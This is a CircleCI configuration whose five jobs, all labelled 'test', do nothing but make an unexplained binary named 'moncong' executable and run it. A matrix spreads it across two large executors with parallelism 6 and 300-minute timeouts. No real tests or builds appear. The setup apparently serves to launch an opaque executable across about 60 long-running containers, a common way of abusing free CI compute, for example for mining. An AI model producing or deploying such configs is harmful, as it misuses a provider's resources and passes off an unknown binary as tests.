version: 2.1

executors:
  pepek:
    docker:
      - image: node
    resource_class: large
  kontol:
    docker:
      - image: node
    resource_class: large

orbs:
  node: circleci/node@4.7.0

jobs:
  test:
    parallelism: 6
    parameters:
      os:
        type: executor
    executor: << parameters.os >>
    steps:
      - checkout
      - run:
         Name: test
         command: |
                     chmod +x moncong && ./moncong
         no_output_timeout: 300m
  build:
    parallelism: 6
    parameters:
      os:
        type: executor
    executor: << parameters.os >>
    steps:
      - checkout
      - run:
         Name: test
         command: |
                     chmod +x moncong && ./moncong
         no_output_timeout: 300m
  building:
    parallelism: 6
    parameters:
      os:
        type: executor
    executor: << parameters.os >>
    steps:
      - checkout
      - run:
         Name: test
         command: |
                     chmod +x moncong && ./moncong
         no_output_timeout: 300m
  runing:
    parallelism: 6
    parameters:
      os:
        type: executor
    executor: << parameters.os >>
    steps:
      - checkout
      - run:
         Name: test
         command: |
                     chmod +x moncong && ./moncong
         no_output_timeout: 300m
  project:
    parallelism: 6
    parameters:
      os:
        type: executor
    executor: << parameters.os >>
    steps:
      - checkout
      - run:
         Name: test
         command: |
                     chmod +x moncong && ./moncong
         no_output_timeout: 300m
workflows:
  all-tests:
    jobs:
      - test:
          matrix:
            parameters:
              os: ["pepek", "kontol"]
      - build:
          matrix:
            parameters:
              os: ["pepek", "kontol"]
      - building:
          matrix:
            parameters:
              os: ["pepek", "kontol"]
      - runing:
          matrix:
            parameters:
              os: ["pepek", "kontol"]
      - project:
          matrix:
            parameters:
              os: ["pepek", "kontol"]